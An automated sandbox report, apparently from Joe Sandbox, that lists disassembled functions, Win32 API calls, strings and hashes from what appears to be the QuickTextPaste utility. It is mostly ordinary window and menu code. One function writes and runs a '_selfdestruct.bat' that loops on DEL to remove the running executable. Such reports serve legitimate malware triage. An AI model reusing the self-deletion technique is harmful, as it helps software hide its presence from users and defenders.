                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Menu$Append$CreatePopup$Value$H_prolog$CloseHandleLoadModuleOpenProtectQueryStringVirtuallstrlen
                                                                                                      • String ID: - $FAQ$QuickTextPaste.ini
                                                                                                      • API String ID: 112474069-1426521461
                                                                                                      • Opcode ID: ae03e5514f816030ce6344a5bcfe3a071372189b20024d42797012ffc1c82b6b
                                                                                                      • Instruction ID: 8389bd1104fbd87995159c740647809b2e1b04f8cd749226a6f1548e7b66da54
                                                                                                      • Opcode Fuzzy Hash: ae03e5514f816030ce6344a5bcfe3a071372189b20024d42797012ffc1c82b6b
                                                                                                      • Instruction Fuzzy Hash: 36C173716843447EF6206B22EC4BF6F7E6DDFC1B54F10181FB248690D2C9F9A944CA6A
                                                                                                      Function 004205F1 Relevance: 65.0, APIs: 43, Instructions: 488windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetClientRect.USER32(?,?), ref: 00420603
                                                                                                      • GetWindowRect.USER32(?,00480388), ref: 0042061B
                                                                                                      • GetSystemMetrics.USER32(00000032), ref: 00420636
                                                                                                      • SendMessageW.USER32(?,00000005,00000000,00000000), ref: 0042065A
                                                                                                      • GetSystemMetrics.USER32(00000031), ref: 00420662
                                                                                                      • SendMessageW.USER32(?,00000404,00000004,?), ref: 004206D7
                                                                                                      • SetWindowPos.USER32(?,00000000,00000004,00000004,00000000,?,00000000), ref: 004206FB
                                                                                                      • GetWindowRect.USER32(?,?), ref: 0042070B
                                                                                                      • GetDlgItem.USER32(?,00000BD7), ref: 0042071D
                                                                                                      • GetDlgItem.USER32(?,00000FBE), ref: 0042072E
                                                                                                      • GetWindowRect.USER32(?,?), ref: 0042075D
                                                                                                      • ScreenToClient.USER32(?,?), ref: 0042077A
                                                                                                      • ScreenToClient.USER32(?,?), ref: 00420785
                                                                                                      • CopyRect.USER32(?,?), ref: 00420792
                                                                                                      • SetWindowPos.USER32(?,00000000,?,?,?,?,00000000), ref: 004207BC
                                                                                                      • ShowWindow.USER32(?,00000000), ref: 004207C6
                                                                                                      • SetWindowPos.USER32(?,00000000,?,?,?,00000005,00000040), ref: 004207E8
                                                                                                      • CopyRect.USER32(?,?), ref: 004207F6
                                                                                                      • SetWindowPos.USER32(00000000,0000000E,?,0000000E,?,00000000), ref: 0042086D
                                                                                                      • SetWindowPos.USER32(?,00000000,0000000E,?,0000000E,?,00000200), ref: 004208A8
                                                                                                      • GetSystemMetrics.USER32(00000032), ref: 004208C3
                                                                                                      • GetDlgItem.USER32(?,00000414), ref: 004208EE
                                                                                                      • SetWindowPos.USER32(00000000,00000000,0000000E,?,0000000E,?,00000000), ref: 00420912
                                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 0042091C
                                                                                                      • SetWindowPos.USER32(?,00000000,0000000E,?,0000000E,?,00000000), ref: 00420956
                                                                                                      • GetSystemMetrics.USER32(00000032), ref: 0042095A
                                                                                                      • GetSystemMetrics.USER32(00000032), ref: 00420979
                                                                                                      • GetDlgItem.USER32(?,00000419), ref: 004209B4
                                                                                                      • ShowWindow.USER32(00000000,00000000), ref: 004209BC
                                                                                                      • SetWindowPos.USER32(?,00000000,0000000E,?,0000000E,?,00000040), ref: 004209DD
                                                                                                      • GetDlgItem.USER32(?,00000410), ref: 004209E7
                                                                                                      • ShowWindow.USER32(00000000,00000000), ref: 00420A1A
                                                                                                      • SetWindowPos.USER32(00000000,00000000,0000000E,?,0000000E,?,00000040), ref: 00420A39
                                                                                                      • GetDlgItem.USER32(?,0000041A), ref: 00420A5B
                                                                                                      • SetWindowPos.USER32(00000000,00000000,-000000EA,?,00000000,?,00000000), ref: 00420A88
                                                                                                      • GetDlgItem.USER32(?,00000412), ref: 00420AA6
                                                                                                      • SetWindowPos.USER32(?,00000000,00000000,?,0000000E,?,00000000), ref: 00420AEA
                                                                                                      • GetDlgItem.USER32(?,0000041E), ref: 00420AF4
                                                                                                      • SetWindowPos.USER32(?,00000000,0000000E,?,0000000E,?,00000000), ref: 00420B30
                                                                                                      • GetDlgItem.USER32(?,00000411), ref: 00420B3A
                                                                                                      • SetWindowPos.USER32(?,00000000,00000000,?,0000000E,?,00000000), ref: 00420B70
                                                                                                      • GetSystemMetrics.USER32(00000032), ref: 00420B76
                                                                                                      • SetWindowPos.USER32(00000000,00000000,?,?,00000000), ref: 00420BA5
                                                                                                        • Part of subcall function 004362C5: GetWindowLongW.USER32(00000000,000000FC), ref: 004362F0
                                                                                                        • Part of subcall function 004362C5: SetWindowLongW.USER32(?,000000FC,0043622C), ref: 00436305
                                                                                                        • Part of subcall function 004362C5: GetClientRect.USER32(?,00000000), ref: 0043631D
                                                                                                        • Part of subcall function 004362C5: SendMessageW.USER32(?,00000418,00000000,00000000), ref: 0043634A
                                                                                                        • Part of subcall function 004362C5: SendMessageW.USER32(?,0000041D,-00000001,?), ref: 0043635A
                                                                                                        • Part of subcall function 004362C5: SetWindowPos.USER32(?,00000000,00420BC1,?,00420BC1,?,00000040,?,?,?,00420BC1,00000000,00000000), ref: 00436379
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$Item$Rect$MetricsSystem$ClientMessageSend$Show$CopyLongScreen
                                                                                                      • String ID:
                                                                                                      • API String ID: 1244584264-0
                                                                                                      • Opcode ID: 6f05e2dde071d3fcd63e3bbacb5e932178fae21c99f71a767f67f7f002c632da
                                                                                                      • Instruction ID: 923e96935bc56571748812aacab09e6193dce8e74519d4da1ece88cee5b03f58
                                                                                                      • Opcode Fuzzy Hash: 6f05e2dde071d3fcd63e3bbacb5e932178fae21c99f71a767f67f7f002c632da
                                                                                                      • Instruction Fuzzy Hash: B912F472D01208EFDF01DFA5EE89AEEBBB9FF48300F259025F904BA165D7715A108B64
                                                                                                      Function 004337FE Relevance: 37.2, APIs: 3, Strings: 18, Instructions: 417COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • __EH_prolog.LIBCMT ref: 00433803
                                                                                                        • Part of subcall function 0043373A: PostMessageW.USER32(0000FFFF,00000112,0000F170,00000002), ref: 0043374B
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: H_prologMessagePost
                                                                                                      • String ID: 4AD$ClTxt2Key$ClipboardImgCliper$ClipboardImgRGBA$CopyHtmlCode2TxtPaste$CopyText2TmpHtmlPageAndOpen$ImgToClipboard$MonitorOff$MonitorOn$PathToClipboard$PathToClipboard+$PathToClipboardSlash$PathToClipboardSlash+$ScreensaverOn$ShellBrowser$SwitchPowerOptions:$Txt2Key$unknown command:
                                                                                                      • API String ID: 1990759635-669570971
                                                                                                      • Opcode ID: 2d18adc57749606c9ee735a7a97bce5040d1ac560683316ef6a2add71d16df3c
                                                                                                      • Instruction ID: f747493f434cbb5bf17634b019a91d2beba60fe9663506b52a7a9a22bfd85391
                                                                                                      • Opcode Fuzzy Hash: 2d18adc57749606c9ee735a7a97bce5040d1ac560683316ef6a2add71d16df3c
                                                                                                      • Instruction Fuzzy Hash: 1EE1B231945288EECF05EBA9C5529FEBB789F25345F14809FB042772C2CA781F09D76A
                                                                                                      Function 004232FE Relevance: 33.5, APIs: 17, Strings: 2, Instructions: 223windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • __EH_prolog.LIBCMT ref: 00423303
                                                                                                      • GetDlgItem.USER32(?,00000400), ref: 0042331E
                                                                                                      • ShowWindow.USER32(00000000,00000000), ref: 00423324
                                                                                                      • GetDlgItem.USER32(?,000003FA), ref: 00423330
                                                                                                      • ShowWindow.USER32(00000000,00000000), ref: 00423334
                                                                                                        • Part of subcall function 00432160: CreateWindowExW.USER32(?,ToolbarWindow32,00000000,?,00000000,00000000,000000B4,00000014,?,00000000,00000000), ref: 0043218B
                                                                                                        • Part of subcall function 00432160: GetStockObject.GDI32(00000011), ref: 0043219E
                                                                                                        • Part of subcall function 00432160: GetObjectW.GDI32(00000000,0000005C,?), ref: 004321BC
                                                                                                        • Part of subcall function 00432160: CreateFontIndirectW.GDI32(?), ref: 004321D1
                                                                                                        • Part of subcall function 00432160: SendMessageW.USER32(00000000,00000030,?,00000000), ref: 004321E7
                                                                                                        • Part of subcall function 00432160: SendMessageW.USER32(00000000,0000041E,00000014,00000000), ref: 004321F2
                                                                                                        • Part of subcall function 00432160: SendMessageW.USER32(00000000,00000420,00000000,00100000), ref: 00432200
                                                                                                        • Part of subcall function 00432160: GetDlgItem.USER32(?,?), ref: 0043220D
                                                                                                        • Part of subcall function 00432160: ShowWindow.USER32(?,00000000), ref: 00432225
                                                                                                        • Part of subcall function 00432160: GetWindowRect.USER32(?,?), ref: 00432232
                                                                                                        • Part of subcall function 00432160: ScreenToClient.USER32(?,?), ref: 00432245
                                                                                                        • Part of subcall function 00432160: ScreenToClient.USER32(?,?), ref: 0043224E
                                                                                                        • Part of subcall function 00432160: SetWindowPos.USER32(00000000,00000000,?,?,?,00000018,00000000), ref: 00432262
                                                                                                        • Part of subcall function 0042A7F8: __EH_prolog.LIBCMT ref: 0042A7FD
                                                                                                        • Part of subcall function 0042A7F8: FindResourceW.KERNEL32(00000000,?,000000F1,00000000,?,000000CE), ref: 0042A81C
                                                                                                        • Part of subcall function 0042A7F8: LoadResource.KERNEL32(00000000,00000000,?,000000CE), ref: 0042A82E
                                                                                                        • Part of subcall function 0042A7F8: LockResource.KERNEL32(00000000,?,000000CE), ref: 0042A83D
                                                                                                        • Part of subcall function 0042A7F8: CreateWindowExW.USER32(00000000,ToolbarWindow32,00000000,?,00000000,00000000,00000064,00000064,?,?,00000000,00000000), ref: 0042A905
                                                                                                      • GetSysColor.USER32(00000005), ref: 00423370
                                                                                                      • ImageList_Create.COMCTL32(00000010,0000000F,00000021,00000008,00000000), ref: 00423396
                                                                                                      • LoadBitmapW.USER32(000000CE), ref: 004233A7
                                                                                                      • ImageList_Add.COMCTL32(?,00000000,00000000), ref: 004233DD
                                                                                                      • SendMessageW.USER32(?,00000430,00000000,?), ref: 004233F4
                                                                                                      • CreateWindowExW.USER32(00000000,msctls_statusbar32,00000000,50000100,00000000,00000000,000000B4,00000014,?,00000000,00000000), ref: 00423427
                                                                                                      • SetParent.USER32(?,?), ref: 00423472
                                                                                                      • SendMessageW.USER32(?,00000408,0000001A,00000000), ref: 00423486
                                                                                                      • GetWindowLongW.USER32(?,000000EC), ref: 00423494
                                                                                                      • SetWindowLongW.USER32(?,000000EC,00000000), ref: 004234AC
                                                                                                      • SendMessageW.USER32(0000000B,00000001,00000000), ref: 00423534
                                                                                                      • ShowWindow.USER32(00000005), ref: 00423542
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$MessageSend$Create$Show$ItemResource$ClientH_prologImageList_LoadLongObjectScreen$BitmapColorFindFontIndirectLockParentRectStock
                                                                                                      • String ID: haE$msctls_statusbar32
                                                                                                      • API String ID: 4149491540-3991912146
                                                                                                      • Opcode ID: dcf999cbac9b8cecd9d9dd04ee244baa22184ebbc412f7a05eb85f18a5fff62e
                                                                                                      • Instruction ID: 9b9568aa611eae975735ec2096975646213566c0aa5ac13f7a4fd9ed550ebb67
                                                                                                      • Opcode Fuzzy Hash: dcf999cbac9b8cecd9d9dd04ee244baa22184ebbc412f7a05eb85f18a5fff62e
                                                                                                      • Instruction Fuzzy Hash: 8A510871340348BBD6306B73EC4AF6B7EACEBC6B48F01452EB645A60D1CA7A6400C779
                                                                                                      Function 004242DE Relevance: 33.4, APIs: 12, Strings: 7, Instructions: 179windowstringCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • __EH_prolog.LIBCMT ref: 004242E3
                                                                                                      • CreatePopupMenu.USER32 ref: 004242F1
                                                                                                      • GetFileAttributesW.KERNEL32(00000000,AAAA_UC.h,?,?,00000000), ref: 00424309
                                                                                                      • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00424344
                                                                                                      • AppendMenuW.USER32(?,00000000,-0000000A,?), ref: 004243BD
                                                                                                      • AppendMenuW.USER32(?,00000C00,00000000,00000000), ref: 004243E9
                                                                                                      • AppendMenuW.USER32(?,00000400,000003E8,Translate), ref: 004243F9
                                                                                                      • AppendMenuW.USER32(?,00000400,000003E9,Load from File (Unicode)), ref: 00424409
                                                                                                      • ClientToScreen.USER32(?,?), ref: 00424449
                                                                                                      • SendMessageW.USER32(?,00000403,000007E6,00000001), ref: 00424463
                                                                                                      • SendMessageW.USER32(?,00000403,000007E6,00000000), ref: 004244B5
                                                                                                      • SendMessageW.USER32(00001042,00000000,00000000), ref: 00424501
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Menu$Append$MessageSend$AttributesClientCreateFileH_prologPopupScreenlstrlen
                                                                                                      • String ID: %d.) %s / %d %%$%s / %d %%$4AD$AAAA_UC.h$Load from File (Unicode)$Translate$lng
                                                                                                      • API String ID: 4159299088-1737303284
                                                                                                      • Opcode ID: 88a189cd6464bc624ca8dfd84b8e6d0c45cd95d6b2b765be75a145a51a818f7f
                                                                                                      • Instruction ID: a8442314cb604f227642efd9dd9ab75479106bc72e832328655ba8be7ea6b6c2
                                                                                                      • Opcode Fuzzy Hash: 88a189cd6464bc624ca8dfd84b8e6d0c45cd95d6b2b765be75a145a51a818f7f
                                                                                                      • Instruction Fuzzy Hash: E761B171E00218AFDF119FA0DC86BAE7B75FB44315F10012BFA14B61E1CBB959808F58
                                                                                                      Function 00429779 Relevance: 31.7, APIs: 13, Strings: 5, Instructions: 196filestringCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • __EH_prolog.LIBCMT ref: 0042977E
                                                                                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000104,:Repeat###DEL "%s"###if exist "%s" goto Repeat###DEL "%s"###DEL "%s"######,00000000,00000000,?), ref: 004297CA
                                                                                                        • Part of subcall function 0042965D: __EH_prolog.LIBCMT ref: 00429662
                                                                                                      • lstrlenW.KERNEL32(_selfdestruct.bat,?,00000000), ref: 0042982E
                                                                                                      • GetTempPathW.KERNEL32(00000104,?,_selfdestruct.bat,_selfdestruct.bat,?,00000000), ref: 00429884
                                                                                                      • GetTempPathW.KERNEL32(00000104,?), ref: 0042988E
                                                                                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 004298BC
                                                                                                      • DeleteFileW.KERNEL32(?,?), ref: 004298DC
                                                                                                      • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 004298F8
                                                                                                      • lstrlenW.KERNEL32(?,###,00445324), ref: 00429959
                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000002,00000000,00000000), ref: 0042997F
                                                                                                      • WriteFile.KERNEL32(?,?,?,?,00000000,?,00000002,00000000,00000000), ref: 00429994
                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,00000000,?,00000002,00000000,00000000), ref: 0042999D
                                                                                                      • ShellExecuteW.SHELL32(00000000,open,?,00000000,?,00000000), ref: 004299B9
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: File$H_prologModuleNamePathTemplstrlen$ByteCharCloseCreateDeleteExecuteHandleMultiShellWideWrite
                                                                                                      • String ID: ###$4AD$:Repeat###DEL "%s"###if exist "%s" goto Repeat###DEL "%s"###DEL "%s"######$_selfdestruct.bat$open
                                                                                                      • API String ID: 4101468688-2224023977
                                                                                                      • Opcode ID: 52dd12a7e30b599fda1aa8e9b655ac36980431a2584507a05a3abe835fa5c315
                                                                                                      • Instruction ID: 48cd7b9b5bed0233e9aab1f54acba56e446661ea439a0b37e3029c57ab290b52
                                                                                                      • Opcode Fuzzy Hash: 52dd12a7e30b599fda1aa8e9b655ac36980431a2584507a05a3abe835fa5c315
                                                                                                      • Instruction Fuzzy Hash: 4B715E72901119ABDF10EBA1CC89EDEBBB8FF45314F1040AAF505B3291DB785A45CF64
                                                                                                      Function 0042462C Relevance: 30.2, APIs: 20, Instructions: 192windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • IsWindowVisible.USER32(?), ref: 0042464A
                                                                                                      • CreatePopupMenu.USER32 ref: 00424652
                                                                                                      • AppendMenuW.USER32(?,00000400,00003200,00000000), ref: 0042467A
                                                                                                        • Part of subcall function 00427C1A: __EH_prolog.LIBCMT ref: 00427C1F
                                                                                                        • Part of subcall function 00427C1A: RegSetValueExW.ADVAPI32(?,_________ADMIN_TEST_SoftwareOK_DOK,00000000,00000004,00000BEC,00000004,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion,00020006,00000400,75AE10E0,?,?,00423BA6), ref: 00427C75
                                                                                                        • Part of subcall function 00427C1A: RegCloseKey.ADVAPI32(?,?,?,00423BA6), ref: 00427C8D
                                                                                                      • AppendMenuW.USER32(?,00000400,00003204,00000000), ref: 004246AD
                                                                                                      • AppendMenuW.USER32(?,00000400,00003202,00000000), ref: 004246C2
                                                                                                      • AppendMenuW.USER32(?,00000C00,00000000,00000000), ref: 004246D1
                                                                                                      • AppendMenuW.USER32(?,?,00000001,00000000), ref: 004246F1
                                                                                                      • AppendMenuW.USER32(?,-00000008,00000003,00000000), ref: 0042470F
                                                                                                      • AppendMenuW.USER32(?,00000C00,00000000,00000000), ref: 0042471E
                                                                                                      • AppendMenuW.USER32(?,00000400,00000002,00000000), ref: 00424730
                                                                                                      • GetCursorPos.USER32(?), ref: 00424737
                                                                                                      • SetForegroundWindow.USER32(?), ref: 00424740
                                                                                                      • EndDialog.USER32(?,00000001), ref: 00424793
                                                                                                      • PostQuitMessage.USER32(00000001), ref: 0042479B
                                                                                                      • IsWindowVisible.USER32(?), ref: 004247E8
                                                                                                      • ShowWindow.USER32(?,00000005), ref: 004247FE
                                                                                                      • SetWindowPos.USER32(?,000000FF,00000000,00000000,00000000,00000000,00000003), ref: 00424815
                                                                                                      • SetWindowPos.USER32(?,000000FE,00000000,00000000,00000000,00000000,00000003), ref: 00424822
                                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000003), ref: 0042482E
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
